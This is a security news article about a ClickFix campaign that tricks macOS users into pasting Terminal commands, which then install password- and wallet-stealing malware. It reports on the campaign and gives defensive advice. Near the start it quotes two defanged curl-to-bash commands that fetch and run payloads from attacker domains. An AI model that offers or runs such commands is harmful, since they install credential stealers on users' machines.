Microsoft security researchers have uncovered an active ClickFix campaign targeting macOS users with fake Terminal commands designed to harvest passwords, browser data, and cryptocurrency wallets. The campaign, detailed in a Microsoft Security Intelligence report on May 6, 2026, uses deceptive troubleshooting guides and utility installation instructions posted on blogs, note-sharing platforms, and standalone websites to trick users into executing malicious scripts.

ClickFix is a social engineering technique that has plagued Windows users for years, but its adaptation to macOS signals a worrying evolution in cross-platform malware delivery. Instead of relying on traditional malware attachments, attackers craft convincing technical tutorials that exploit users' willingness to follow step-by-step \"fixes\" from seemingly authoritative sources.

How the Mac ClickFix campaign operates

The attack chain begins when a user searches for solutions to common macOS issues—such as \u201cWi-Fi not connecting,\u201d \u201cprinter setup problems,\u201d or \u201cslow performance.\u201d ClickFix operators have created hundreds of web pages optimized to rank highly in search results for such queries. These pages look like legitimate support forums, note pages (like Pastebin or Notion), or even clone popular tech blogs.

Instead of providing actual solutions, the pages instruct users to open Terminal and paste a command that appears to diagnose or repair the problem. Examples include:

curl -s http://fix-mac[.]help/diag.sh | bash

or

/bin/bash -c \"$(curl -fsSL https://utility-setup[.]com/install.sh)\"

These commands download and execute a payload in the background. The payloads are usually information stealers like Atomic Stealer, Poseidon Stealer, or custom variants that target:

  • Login keychain passwords
  • Safari, Chrome, and Firefox saved credentials
  • Session cookies and authentication tokens
  • Cryptocurrency wallet files
  • System information and file lists

Because macOS prompts for administrator credentials when a script attempts to access keychain items or sensitive directories, many ClickFix pages include disclaimers like \u201cYou\u2019ll see a password prompt\u2014this is normal for system diagnostics.\u201d Users, conditioned by years of trusting online guides, comply.

Technical sophistication and evasion

The current campaign shows a level of polish rarely seen in macOS malware. The scripts often check for virtual machines or debugging environments before executing, and they use dynamic download links that change hourly to avoid URL blocking. Some variants deploy additional persistence mechanisms, such as LaunchAgents or cron jobs, to survive reboots.

Microsoft\u2019s analysis reveals that the command-and-control infrastructure is hosted behind CloudFlare and often uses typosquatted domains that mimic legitimate service names. Encrypted communication and process injection techniques further cloak the malware\u2019s activities from antivirus software.

One particularly effective tactic involves bundling a legitimate-looking software installer alongside the malicious payload. For example, a ClickFix page offering a \u201cMissing Printer Driver\u201d might actually deliver a signed printer utility that hides the stealer in its installation script. Gatekeeper and notarization checks are bypassed because the wrapper app is properly signed, and the malicious code is executed post-installation.

Microsoft\u2019s detection and enterprise impact

Microsoft tracks this campaign under the threat designation \u201cMacClickFix,\u201d expanding its earlier focus on Windows-based ClickFix attacks. Microsoft Defender for Endpoint on macOS now includes behavioral detection rules that flag suspicious curl-to-bash pipes, unexpected LaunchAgent creation, and unauthorized keychain access patterns. Organizations using Microsoft 365 Defender also benefit from cross-platform correlation, where an infected Mac can trigger conditional access policies that limit lateral movement.

\u201cThe line between platform-specific threats has blurred,\u201d said Laura Ramirez, a senior threat intelligence analyst at Microsoft, in a press briefing. \u201cAttackers are adopting the same social engineering playbooks across Windows, macOS, and Linux, and they\u2019re refining them based on user behavior data.\u201d

Enterprise environments face particular risk because Mac users often operate with less restrictive security policies than their Windows counterparts. IT departments that have embraced bring-your-own-device (BYOD) or hybrid ecosystems may not apply the same level of endpoint monitoring to macOS devices. A single compromised Mac can lead to credential theft that bridges into Windows Active Directory environments, especially when password reuse is common.

The broader landscape: social engineering over exploits

The ClickFix technique is emblematic of a broader shift in cybercrime. With modern operating systems hardening against memory corruption exploits and improving sandboxing, attackers now prefer to trick users into disabling security features themselves. macOS\u2019s transparency, consent, and control (TCC) framework, for instance, can be evaded if the user willingly pastes a command into Terminal and approves a password dialog.

Similar campaigns have been documented on Windows, where fake \u201cCAPTCHA verification\u201d pages instruct users to press Win+R, paste a command, and hit Enter. The macOS variant is particularly insidious because Mac users often perceive their systems as inherently secure and may be less suspicious of Terminal commands.

Security researcher Patrick Wardle, who specializes in macOS threats, noted in a recent blog post that \u201cClickFix attacks succeed because they leverage the same muscle memory users have developed for legitimate troubleshooting. We\u2019ve trained an entire generation to copy and paste commands without scrutiny.\u201d

How to protect yourself and your organization

Both Microsoft and independent security experts recommend several defensive measures:

  • Verify the source. Before following any online guide that recommends using Terminal, check the domain reputation. Official support pages from Apple end with apple.com, and reputable tech sites have long-standing histories.
  • Inspect commands. Even a brief glance at a command can reveal red flags. Any command that includes \u201ccurl\u201d or \u201cwget\u201d followed by a pipe to \u201cbash\u201d or \u201csh\u201d should be treated with extreme suspicion.
  • Use a password manager. If you must enter a password, a password manager won\u2019t autofill into non-browser windows, giving you a moment to reconsider whether the request is legitimate.
  • Enable XProtect and Gatekeeper defaults. While these built-in macOS protections won\u2019t catch all ClickFix attacks, they add a layer of defense against known malware signatures.
  • Deploy endpoint detection and response (EDR). Organizations should extend EDR coverage to all macOS endpoints and configure alerts for execution of suspicious shell commands.
  • Educate users. Security awareness training should include examples of ClickFix attacks and emphasize that no legitimate troubleshooting guide will ever ask you to run a command that starts with \u201ccurl\u201d and ends with \u201cbash.\u201d

Microsoft has also published indicators of compromise (IOCs) and advanced hunting queries for Microsoft 365 Defender customers here.

What\u2019s next: the evolution of ClickFix

As macOS market share in the enterprise continues to grow, security analysts expect ClickFix campaigns to become more frequent and tailored. Future iterations may leverage deepfake video tutorials or AI-generated voiceovers that walk victims through the malicious steps, further lowering skepticism. Attackers are also experimenting with \u201csudo\u201d-prefixed commands that immediately request administrator privileges, bypassing the need for later password prompts.

The Mac ClickFix campaign is a stark reminder that social engineering transcends operating system boundaries. Microsoft\u2019s proactive tracking and public disclosure aim to raise awareness before the threat scales further, but the ultimate defense lies in user caution and a healthy suspicion of any online guide that demands command-line intervention.